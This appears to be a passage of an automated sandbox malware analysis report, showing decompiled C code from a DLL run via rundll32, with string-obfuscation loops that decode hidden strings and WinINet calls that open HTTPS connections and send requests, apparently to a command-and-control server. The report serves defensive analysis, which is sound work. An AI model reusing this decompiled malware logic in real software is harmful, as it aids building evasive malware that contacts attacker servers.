				asm("xorps xmm0, xmm0");
				_t150 = 0;
				asm("movlpd [ebp-0x1c], xmm0");
				 *((char*)(_t176 - 0x4c)) = 0x4c;
				 *((char*)(_t176 - 0x4b)) = 0x51;
				 *((char*)(_t176 - 0x4a)) = 0x6b;
				 *((char*)(_t176 - 0x49)) = 0x32;
				 *((char*)(_t176 - 0x48)) = 0x1e;
				 *((char*)(_t176 - 0x47)) = 0x7e;
				 *((char*)(_t176 - 0x46)) = 0x47;
				 *((char*)(_t176 - 0x45)) = 0x74;
				 *((char*)(_t176 - 0x44)) = 0x2b;
				 *((char*)(_t176 - 0x43)) = 0x7e;
				 *((char*)(_t176 - 0x42)) = 0x57;
				 *((char*)(_t176 - 0x41)) = 0xb;
				 *((char*)(_t176 - 0x40)) = 0x74;
				 *((char*)(_t176 - 0x3f)) = 0x31;
				 *((char*)(_t176 - 0x3e)) = 0x51;
				 *((char*)(_t176 - 0x3d)) = 0x6b;
				 *((char*)(_t176 - 0x3c)) = 0x32;
				 *((char*)(_t176 - 0x3b)) = 0x1e;
				 *((char*)(_t176 - 0x3a)) = 0x7e;
				 *((char*)(_t176 - 0x39)) = 0x70;
				 *((char*)(_t176 - 0x38)) = 0;
				_t172 = 0x7f;
				if( *((intOrPtr*)(_t176 - 0x38)) != 0) {
					L5:
					 *((char*)(_t176 - 0x34)) = 0x44;
					 *((char*)(_t176 - 0x33)) = 0x66;
					 *((char*)(_t176 - 0x32)) = 0x4f;
					 *((char*)(_t176 - 0x31)) = 0x7d;
					 *((char*)(_t176 - 0x30)) = 0x10;
					 *((char*)(_t176 - 0x2f)) = 0x44;
					 *((char*)(_t176 - 0x2e)) = 7;
					 *((char*)(_t176 - 0x2d)) = 0x5d;
					 *((char*)(_t176 - 0x2c)) = 0x14;
					 *((char*)(_t176 - 0x2b)) = 0x61;
					 *((char*)(_t176 - 0x2a)) = 0x4b;
					 *((char*)(_t176 - 0x29)) = 0x4f;
					 *((char*)(_t176 - 0x28)) = 0x59;
					 *((char*)(_t176 - 0x27)) = _t150;
					if( *((char*)(_t176 - 0x27)) != 0) {
						L9:
						 *((char*)(_t176 - 0x24)) = 7;
						 *((char*)(_t176 - 0x23)) = 0x78;
						 *((char*)(_t176 - 0x22)) = 0x3b;
						 *((char*)(_t176 - 0x21)) = 0x49;
						 *((char*)(_t176 - 0x20)) = 0x34;
						 *((char*)(_t176 - 0x1f)) = _t150;
						if( *((char*)(_t176 - 0x1f)) != 0) {
							L13:
							_push(3);
							_push(_t156);
							_push(_t156);
							_push(0x13);
							_push(_t176 - 0x4c);
							_push(_t176 - 0x24);
							_push(_t176 - 0x34);
							_push(_t176 - 0x1c); // executed
							E6E773C02(_t175, 0); // executed
							 *((intOrPtr*)(_t176 - 4)) = _t150;
							_t188 =  *((intOrPtr*)(_t176 - 0x1c));
							if( *((intOrPtr*)(_t176 - 0x1c)) == 0) {
								L18:
								E6E773BE3(_t175);
								 *((intOrPtr*)(_t176 - 4)) = 2;
								__eflags =  *((intOrPtr*)(_t176 - 0x1c));
								if( *((intOrPtr*)(_t176 - 0x1c)) != 0) {
									_t107 = E6E77111C() + 4; // 0x4
									E6E778517(_t107, _t172,  *((intOrPtr*)(_t176 - 0x1c)));
								}
								goto L21;
							}
							_t128 = E6E77315C(_t172, _t188, _t176 - 0x1c); // executed
							if(_t128 == 0) {
								goto L18;
							}
							 *((intOrPtr*)(_t176 - 4)) = 1;
							if( *((intOrPtr*)(_t176 - 0x1c)) != 0) {
								_t103 = E6E77111C() + 4; // 0x4, executed
								E6E778517(_t103, _t172,  *((intOrPtr*)(_t176 - 0x1c))); // executed
							}
							_t115 = 1;
							goto L22;
						}
						_t173 = _t150;
						_t153 = 0x7f;
						do {
							_t162 = 0x34;
							_t156 = _t162 - ( *(_t176 + _t173 - 0x24) & 0x000000ff);
							asm("cdq");
							asm("cdq");
							 *(_t176 + _t173 - 0x24) = (_t153 + _t156 * 0x1b % _t153) % _t153;
							_t173 = _t173 + 1;
						} while (_t173 < 5);
						 *((char*)(_t176 - 0x1f)) = 1;
						_t150 = 0;
						goto L13;
					}
					_t163 = _t150;
					do {
						asm("cdq");
						asm("cdq");
						 *(_t176 + _t163 - 0x34) = (_t172 + (( *(_t176 + _t163 - 0x34) & 0x000000ff) - 0x59) * 0x1c % _t172) % _t172;
						_t163 = _t163 + 1;
					} while (_t163 < 0xd);
					 *((char*)(_t176 - 0x27)) = 1;
					goto L9;
				}
				_push(0x7f);
				_t174 = 0;
				do {
					_t164 = 0x70;
					_t156 = _t164 - ( *(_t176 + _t174 - 0x4c) & 0x000000ff);
					asm("cdq");
					asm("cdq");
					 *(_t176 + _t174 - 0x4c) = (0 + _t156 * 0x14 % 0) % 0;
					_t174 = _t174 + 1;
				} while (_t174 < 0x14);
				 *((char*)(_t176 - 0x38)) = 1;
				_t150 = 0;
				_t172 = 0x7f;
				goto L5;
			}


















                                                      0x6e773519
                                                      0x6e773519
                                                      0x6e773520
                                                      0x6e773525
                                                      0x6e773535
                                                      0x6e773535
                                                      0x6e773538
                                                      0x6e77353d
                                                      0x6e773542
                                                      0x6e773718
                                                      0x6e77371b
                                                      0x6e77371b
                                                      0x6e77371b
                                                      0x6e77371d
                                                      0x6e77371d
                                                      0x6e773722
                                                      0x6e773722
                                                      0x6e773548
                                                      0x6e77354b
                                                      0x6e77354d
                                                      0x6e773552
                                                      0x6e773556
                                                      0x6e77355a
                                                      0x6e77355e
                                                      0x6e773562
                                                      0x6e773566
                                                      0x6e77356a
                                                      0x6e77356e
                                                      0x6e773572
                                                      0x6e773576
                                                      0x6e77357a
                                                      0x6e77357e
                                                      0x6e773582
                                                      0x6e773586
                                                      0x6e77358a
                                                      0x6e77358e
                                                      0x6e773592
                                                      0x6e773596
                                                      0x6e77359a
                                                      0x6e77359e
                                                      0x6e7735a5
                                                      0x6e7735aa
                                                      0x6e7735ae
                                                      0x6e7735e0
                                                      0x6e7735e0
                                                      0x6e7735e4
                                                      0x6e7735e8
                                                      0x6e7735ec
                                                      0x6e7735f0
                                                      0x6e7735f4
                                                      0x6e7735f8
                                                      0x6e7735fc
                                                      0x6e773600
                                                      0x6e773604
                                                      0x6e773608
                                                      0x6e77360c
                                                      0x6e773610
                                                      0x6e773617
                                                      0x6e77361e
                                                      0x6e773646
                                                      0x6e773646
                                                      0x6e77364a
                                                      0x6e77364e
                                                      0x6e773652
                                                      0x6e773656
                                                      0x6e77365d
                                                      0x6e773664
                                                      0x6e773693
                                                      0x6e773693
                                                      0x6e773695
                                                      0x6e773696
                                                      0x6e773697
                                                      0x6e77369e
                                                      0x6e7736a2
                                                      0x6e7736a6
                                                      0x6e7736aa
                                                      0x6e7736ab
                                                      0x6e7736b0
                                                      0x6e7736b3
                                                      0x6e7736b7
                                                      0x6e7736e6
                                                      0x6e7736e8
                                                      0x6e7736ed
                                                      0x6e7736f4
                                                      0x6e7736f8
                                                      0x6e773702
                                                      0x6e773705
                                                      0x6e773705
                                                      0x00000000
                                                      0x6e7736f8
                                                      0x6e7736bd
                                                      0x6e7736c4
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7736c9
                                                      0x6e7736d0
                                                      0x6e7736da
                                                      0x6e7736dd
                                                      0x6e7736dd
                                                      0x6e7736e2
                                                      0x00000000
                                                      0x6e7736e2
                                                      0x6e773668
                                                      0x6e77366a
                                                      0x6e77366b
                                                      0x6e773674
                                                      0x6e773675
                                                      0x6e77367a
                                                      0x6e773680
                                                      0x6e773683
                                                      0x6e773687
                                                      0x6e773688
                                                      0x6e77368d
                                                      0x6e773691
                                                      0x00000000
                                                      0x6e773691
                                                      0x6e773620
                                                      0x6e773622
                                                      0x6e77362f
                                                      0x6e773635
                                                      0x6e773638
                                                      0x6e77363c
                                                      0x6e77363d
                                                      0x6e773642
                                                      0x00000000
                                                      0x6e773642
                                                      0x6e7735b0
                                                      0x6e7735b2
                                                      0x6e7735b5
                                                      0x6e7735be
                                                      0x6e7735bf
                                                      0x6e7735c4
                                                      0x6e7735ca
                                                      0x6e7735cd
                                                      0x6e7735d1
                                                      0x6e7735d2
                                                      0x6e7735d9
                                                      0x6e7735dd
                                                      0x6e7735df
                                                      0x00000000

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 6E773520
                                                        • Part of subcall function 6E77111C: __EH_prolog3.LIBCMT ref: 6E771123
                                                        • Part of subcall function 6E772F23: InternetConnectA.WININET(00000060,00000017,000001BB,00000000,00000000,00000003,00000000,00000000,00000006), ref: 6E772FC5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ConnectH_prolog3H_prolog3_Internet
                                                      • String ID: +$1$2$2$D$D$G$K$L$O$O$Q$Q$W$Y$]$a$f$k$k$k@iDoikF@ $p$t$t$}$~$~$~
                                                      • API String ID: 3624664126-3538368236
                                                      • Opcode ID: 38fe0c3eae832f5cd981701fe9cc360ccea0d67fab3623454bb3c4eff8a197bf
                                                      • Instruction ID: 60158eb5798e0fdc052c9596fff00e0a1c7c3af988a233fac68975321f5b8f3d
                                                      • Opcode Fuzzy Hash: 38fe0c3eae832f5cd981701fe9cc360ccea0d67fab3623454bb3c4eff8a197bf
                                                      • Instruction Fuzzy Hash: B2719160D082C9DDEF12CAF8D5887DDBFF51F26308F0801A9D4846B2A2D7BA5649CB25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E778517, Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 57networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 736 6e778517-6e77857b 737 6e7785a6-6e7785b8 call 6e77657f InternetCloseHandle 736->737 738 6e77857d-6e778580 736->738 739 6e778581-6e77859f 738->739 739->739 741 6e7785a1-6e7785a5 739->741 741->737
                                                      C-Code - Quality: 92%
                                                      			E6E778517(void* __ecx, void* __edi, void* _a4) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				int _t43;
				char _t52;
				signed int _t57;
				void* _t59;
				void* _t60;

				_v28 = 0x6e;
				_v27 = 0x64;
				_v26 = 0x10;
				_v25 = 0x63;
				_v24 = 0x2c;
				_v23 = 0x64;
				_v22 = 0x63;
				_v21 = 0x10;
				_v20 = 0x43;
				_v19 = 1;
				_v18 = 0x56;
				_v17 = 0x1e;
				_v16 = 0x63;
				_v15 = 0x7c;
				_v14 = 0x1c;
				_v13 = 0x64;
				_v12 = 0x71;
				_v11 = 1;
				_v10 = 0x63;
				_v9 = 0x74;
				_t59 = __ecx;
				_t52 = 0;
				_v8 = 0;
				if(_v8 == 0) {
					_t57 = 0x7f;
					do {
						asm("cdq");
						asm("cdq");
						 *(_t60 + _t52 - 0x18) = (_t57 + (( *(_t60 + _t52 - 0x18) & 0x000000ff) - 0x74) * 9 % _t57) % _t57;
						_t52 = _t52 + 1;
					} while (_t52 < 0x14);
					_v8 = 1;
				}
				E6E77657F(_t59,  &_v28);
				_t43 = InternetCloseHandle(_a4); // executed
				return _t43;
			}





























                                                      0x6e77851d
                                                      0x6e778521
                                                      0x6e778525
                                                      0x6e778529
                                                      0x6e77852d
                                                      0x6e778531
                                                      0x6e778535
                                                      0x6e778539
                                                      0x6e77853d
                                                      0x6e778541
                                                      0x6e778545
                                                      0x6e778549
                                                      0x6e77854d
                                                      0x6e778551
                                                      0x6e778555
                                                      0x6e778559
                                                      0x6e77855d
                                                      0x6e778561
                                                      0x6e778565
                                                      0x6e77856a
                                                      0x6e77856e
                                                      0x6e778573
                                                      0x6e778575
                                                      0x6e77857b
                                                      0x6e778580
                                                      0x6e778581
                                                      0x6e77858e
                                                      0x6e778594
                                                      0x6e778597
                                                      0x6e77859b
                                                      0x6e77859c
                                                      0x6e7785a1
                                                      0x6e7785a5
                                                      0x6e7785ac
                                                      0x6e7785b4
                                                      0x6e7785b8

                                                      APIs
                                                      • InternetCloseHandle.WININET(00000071,0000006E), ref: 6E7785B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleInternet
                                                      • String ID: ,$C$V$c$c$c$c$d$d$d$n$q$t$|
                                                      • API String ID: 1081599783-1780860937
                                                      • Opcode ID: c4b71aa700656d7cdbb789f07f79476cadf1c79ef259adfe1cdc6568c20eb706
                                                      • Instruction ID: 64dad29cffdb38f9c9fa2f90c3d91545e6503b6e8647c88edb4634247a23dd76
                                                      • Opcode Fuzzy Hash: c4b71aa700656d7cdbb789f07f79476cadf1c79ef259adfe1cdc6568c20eb706
                                                      • Instruction Fuzzy Hash: F6212C20C0C2C9E8EF12C2BC95597EEBFE50F62708F1840D9D5846B292C2FA4758D3B6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7722FC, Relevance: 24.2, APIs: 4, Strings: 12, Instructions: 160memorystringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 80%
                                                      			E6E7722FC() {
				signed int _v8;
				short _v24;
				short _v48;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				short _v64;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				short _v88;
				intOrPtr _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t87;
				signed int _t117;
				signed int _t123;
				void* _t126;
				signed int _t132;
				void* _t134;
				void* _t135;
				signed int _t139;
				signed int _t143;
				long _t145;
				long _t146;
				signed int _t147;

				_t87 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t87 ^ _t147;
				asm("xorps xmm0, xmm0");
				asm("movups [0x6e78d3a8], xmm0");
				_v88 = 0x31;
				_v87 = 8;
				_v86 = 0xb;
				_v85 = 8;
				_v84 = 0x1e;
				_v83 = 8;
				_v82 = 0x3d;
				_v81 = 8;
				_v80 = 0x64;
				_v79 = 8;
				_v78 = 0x23;
				_v77 = 8;
				_v76 = 4;
				_v75 = 8;
				_v74 = 0x58;
				_v73 = 8;
				_v72 = 0x38;
				_v71 = 8;
				_v70 = 0x6b;
				_v69 = 8;
				_v68 = 8;
				_v67 = 8;
				_v66 = 0;
				_t139 = 0x7f;
				if(_v66 == 0) {
					_t146 = 0;
					do {
						_t135 = 8;
						_t127 = _t135 - ( *(_t147 + _t146 - 0x54) & 0x000000ff);
						asm("cdq");
						_t123 = _t139 + (_t135 - ( *(_t147 + _t146 - 0x54) & 0x000000ff)) * 0x14 % _t139;
						asm("cdq");
						_t136 = _t123 % _t139;
						 *(_t147 + _t146 - 0x54) = _t123 % _t139;
						_t146 = _t146 + 1;
					} while (_t146 < 0x16);
					_v66 = 1;
				}
				_t140 = lstrcpyW;
				lstrcpyW( &_v48,  &_v88);
				_t44 = E6E77111C() + 0x18; // 0x18, executed
				_t128 = _t44;
				E6E771BF5(_t44, 0x6e78c880, 0x6e78d3a8,  &_v48, _t127, _t127); // executed
				_v64 = 0x3e;
				_v63 = 0x1f;
				_v62 = 0x26;
				_v61 = 0x1f;
				_v60 = 0x5c;
				_v59 = 0x1f;
				_v58 = 0x49;
				_v57 = 0x1f;
				_v56 = 0x6b;
				_v55 = 0x1f;
				_v54 = 0x1d;
				_v53 = 0x1f;
				_v52 = 0x1f;
				_v51 = 0x1f;
				_v50 = 0;
				if(_v50 == 0) {
					_t145 = 0;
					_t143 = 0x7f;
					do {
						_t134 = 0x1f;
						_t128 = _t134 - ( *(_t147 + _t145 - 0x3c) & 0x000000ff);
						asm("cdq");
						_t117 = _t143 + (_t134 - ( *(_t147 + _t145 - 0x3c) & 0x000000ff)) * 0x1a % _t143;
						asm("cdq");
						_t136 = _t117 % _t143;
						 *(_t147 + _t145 - 0x3c) = _t117 % _t143;
						_t145 = _t145 + 1;
					} while (_t145 < 0xe);
					_t140 = lstrcpyW;
					_v50 = 1;
				}
				lstrcpyW( &_v24,  &_v64);
				_t79 = E6E77111C() + 0x18; // 0x18, executed
				E6E771BF5(_t79, 0x6e78c880, 0x6e78d3ac,  &_v24, _t128, _t128); // executed
				_v92 = GetProcessHeap;
				_t126 = HeapAlloc(GetProcessHeap(), 0, 0x68);
				if(_t126 != 0) {
					 *_t126 = 0x33534345;
					_t81 = _t126 + 9; // 0x9
					 *((intOrPtr*)(_t126 + 4)) = 0x30;
					_t132 = 0x17;
					 *((char*)(_t126 + 8)) = 0x3b;
					memcpy(_t81, 0x6e78c880, _t132 << 2);
					_t140 = 0x6e78c880 + _t132 + _t132;
					asm("movsw");
					asm("movsb");
					E6E772561(0x6e78c880 + _t132 + _t132, _t126);
					HeapFree(_v92(0), 0, _t126);
				}
				E6E772CF7();
				return E6E778727(_t126, _v8 ^ _t147, _t136, _t140, 0x6e78c880);
			}





























































                                                      0x6e772302
                                                      0x6e772309
                                                      0x6e77230f
                                                      0x6e772312
                                                      0x6e772319
                                                      0x6e77231d
                                                      0x6e772321
                                                      0x6e772325
                                                      0x6e772329
                                                      0x6e77232d
                                                      0x6e772331
                                                      0x6e772335
                                                      0x6e772339
                                                      0x6e77233d
                                                      0x6e772341
                                                      0x6e772345
                                                      0x6e772349
                                                      0x6e77234d
                                                      0x6e772351
                                                      0x6e772355
                                                      0x6e772359
                                                      0x6e77235d
                                                      0x6e772361
                                                      0x6e772367
                                                      0x6e77236b
                                                      0x6e77236f
                                                      0x6e772376
                                                      0x6e77237b
                                                      0x6e77237f
                                                      0x6e772381
                                                      0x6e772383
                                                      0x6e77238c
                                                      0x6e77238d
                                                      0x6e772392
                                                      0x6e772395
                                                      0x6e772398
                                                      0x6e772399
                                                      0x6e77239b
                                                      0x6e77239f
                                                      0x6e7723a0
                                                      0x6e7723a5
                                                      0x6e7723a5
                                                      0x6e7723a9
                                                      0x6e7723b7
                                                      0x6e7723c9
                                                      0x6e7723c9
                                                      0x6e7723cc
                                                      0x6e7723d1
                                                      0x6e7723d5
                                                      0x6e7723d9
                                                      0x6e7723dd
                                                      0x6e7723e1
                                                      0x6e7723e5
                                                      0x6e7723e9
                                                      0x6e7723ed
                                                      0x6e7723f1
                                                      0x6e7723f5
                                                      0x6e7723f9
                                                      0x6e7723fd
                                                      0x6e772401
                                                      0x6e772405
                                                      0x6e77240c
                                                      0x6e772412
                                                      0x6e772416
                                                      0x6e772418
                                                      0x6e772419
                                                      0x6e772422
                                                      0x6e772423
                                                      0x6e772428
                                                      0x6e77242b
                                                      0x6e77242e
                                                      0x6e77242f
                                                      0x6e772431
                                                      0x6e772435
                                                      0x6e772436
                                                      0x6e77243b
                                                      0x6e772441
                                                      0x6e772441
                                                      0x6e77244d
                                                      0x6e77245f
                                                      0x6e772462
                                                      0x6e77246f
                                                      0x6e77247b
                                                      0x6e77247f
                                                      0x6e772481
                                                      0x6e772487
                                                      0x6e77248c
                                                      0x6e772498
                                                      0x6e772499
                                                      0x6e77249d
                                                      0x6e77249d
                                                      0x6e7724a1
                                                      0x6e7724a3
                                                      0x6e7724a4
                                                      0x6e7724b0
                                                      0x6e7724b0
                                                      0x6e7724b6
                                                      0x6e7724ce

                                                      APIs
                                                      • lstrcpyW.KERNEL32(?,00000031), ref: 6E7723B7
                                                      • lstrcpyW.KERNEL32(?,0000003E), ref: 6E77244D
                                                      • HeapAlloc.KERNEL32(00000000), ref: 6E772475
                                                      • HeapFree.KERNEL32(00000000), ref: 6E7724B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heaplstrcpy$AllocFree
                                                      • String ID: #$&$1$8$=$>$I$X$\$d$k$k
                                                      • API String ID: 3415515856-1177584713
                                                      • Opcode ID: 5fca221f87c19d5663d616649bdc41e6aeb6901da1393ea51a83f04815c9cda3
                                                      • Instruction ID: f86f9f2031df390da835d0986add5298457a9f006d91fcc4da106d668dd930fb
                                                      • Opcode Fuzzy Hash: 5fca221f87c19d5663d616649bdc41e6aeb6901da1393ea51a83f04815c9cda3
                                                      • Instruction Fuzzy Hash: 435193609082C8D9EF12DBE8E5887DDBFB85F27308F5840A9E5817B292C6B9454DC762
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E773E54, Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 64networkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E6E773E54(void* __ecx, void* __esi, void* _a4, char* _a8, long _a12) {
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				int _t42;
				void* _t49;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;

				_v24 = 0x63;
				_v23 = 0x7e;
				_v22 = 0x7e;
				_v21 = 0x70;
				_v20 = 0x4a;
				_v19 = 0xa;
				_v18 = 0x69;
				_v17 = 0x46;
				_v16 = 7;
				_v15 = 0xa;
				_v14 = 0x34;
				_v13 = 0x42;
				_v12 = 0xa;
				_v11 = 0x3b;
				_v10 = 0x7e;
				_v9 = 0xb;
				_v8 = 0x65;
				_t49 = 0;
				_v7 = 0;
				_t57 = __ecx;
				if(_v7 == 0) {
					_push(0x7f);
					_t59 = 0;
					do {
						_t53 = 0x65;
						asm("cdq");
						asm("cdq");
						 *(_t61 + _t59 - 0x14) = (0 + (_t53 - ( *(_t61 + _t59 - 0x14) & 0x000000ff)) * 0x24 % 0) % 0;
						_t59 = _t59 + 1;
					} while (_t59 < 0x11);
					_v7 = 1;
					_t49 = 0;
				}
				E6E77657F(_t57,  &_v24);
				_t42 = HttpSendRequestA(_a4, _a8, _a12, _t49, _t49); // executed
				return _t42;
			}



























                                                      0x6e773e5a
                                                      0x6e773e5e
                                                      0x6e773e62
                                                      0x6e773e66
                                                      0x6e773e6a
                                                      0x6e773e6e
                                                      0x6e773e72
                                                      0x6e773e76
                                                      0x6e773e7a
                                                      0x6e773e7e
                                                      0x6e773e82
                                                      0x6e773e86
                                                      0x6e773e8a
                                                      0x6e773e8e
                                                      0x6e773e92
                                                      0x6e773e96
                                                      0x6e773e9b
                                                      0x6e773e9f
                                                      0x6e773ea4
                                                      0x6e773ea8
                                                      0x6e773ead
                                                      0x6e773eb0
                                                      0x6e773eb2
                                                      0x6e773eb5
                                                      0x6e773ebe
                                                      0x6e773ec4
                                                      0x6e773eca
                                                      0x6e773ecd
                                                      0x6e773ed1
                                                      0x6e773ed2
                                                      0x6e773ed7
                                                      0x6e773edb
                                                      0x6e773edd
                                                      0x6e773ee4
                                                      0x6e773ef4
                                                      0x6e773ef9

                                                      APIs
                                                      • HttpSendRequestA.WININET(0000000A,00000007,0000004A,00000000,00000000,00000063,00000000,?), ref: 6E773EF4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: HttpRequestSend
                                                      • String ID: 4$;$B$F$J$c$e$i$p$~$~$~
                                                      • API String ID: 360639707-529270253
                                                      • Opcode ID: 2dabd6ed036f37d8dfb9a4ecf54340ff2d0b4b521eb794d599619251d70175a0
                                                      • Instruction ID: d6784646ee8207844a58c232051217c418a2ff92d1416fc501eecee2c98354e0
                                                      • Opcode Fuzzy Hash: 2dabd6ed036f37d8dfb9a4ecf54340ff2d0b4b521eb794d599619251d70175a0
                                                      • Instruction Fuzzy Hash: 5E218351D0D2C8ADEF12C6ED89587DEBFA55B26348F0880E9D4846B292C2BA4719D372
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E773DA7, Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 64networkCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E6E773DA7(void* __ecx, void* __edi, void* _a4, char* _a8, char* _a12, char* _a16) {
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				void* _t43;
				char* _t54;
				signed int _t58;
				void* _t60;
				void* _t61;

				_v24 = 6;
				_v23 = 0x63;
				_v22 = 0x63;
				_v21 = 0x4f;
				_v20 = 0x29;
				_v19 = 0x4f;
				_v18 = 0x18;
				_v17 = 0x45;
				_v16 = 0x38;
				_v15 = 0x18;
				_v14 = 0x54;
				_v13 = 0x68;
				_v12 = 0x18;
				_v11 = 0x5e;
				_v10 = 0x63;
				_v9 = 0x62;
				_v8 = 0x1b;
				_v7 = 0;
				_t60 = __ecx;
				if(_v7 == 0) {
					_t54 = 0;
					_t58 = 0x7f;
					do {
						asm("cdq");
						asm("cdq");
						 *(_t61 + _t54 - 0x14) = (_t58 + (( *(_t61 + _t54 - 0x14) & 0x000000ff) - 0x1b) * 0x33 % _t58) % _t58;
						_t54 = _t54 + 1;
					} while (_t54 < 0x11);
					_v7 = 1;
				}
				E6E77657F(_t60,  &_v24);
				_t43 = HttpOpenRequestA(_a4, _a8, _a12, _a16, 0, 0, 0x800000, 0); // executed
				return _t43;
			}


























                                                      0x6e773dad
                                                      0x6e773db1
                                                      0x6e773db5
                                                      0x6e773db9
                                                      0x6e773dbd
                                                      0x6e773dc1
                                                      0x6e773dc5
                                                      0x6e773dc9
                                                      0x6e773dcd
                                                      0x6e773dd1
                                                      0x6e773dd5
                                                      0x6e773dd9
                                                      0x6e773ddd
                                                      0x6e773de1
                                                      0x6e773de5
                                                      0x6e773de9
                                                      0x6e773dee
                                                      0x6e773df7
                                                      0x6e773dfb
                                                      0x6e773e00
                                                      0x6e773e05
                                                      0x6e773e07
                                                      0x6e773e08
                                                      0x6e773e15
                                                      0x6e773e1b
                                                      0x6e773e1e
                                                      0x6e773e22
                                                      0x6e773e23
                                                      0x6e773e28
                                                      0x6e773e2c
                                                      0x6e773e33
                                                      0x6e773e4c
                                                      0x6e773e51

                                                      APIs
                                                      • HttpOpenRequestA.WININET(00000018,00000038,00000029,00000006,00000000,00000000,00800000,00000000,00000006,?,?), ref: 6E773E4C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: HttpOpenRequest
                                                      • String ID: )$8$E$O$O$T$^$b$c$c$c$h
                                                      • API String ID: 1984915467-989942238
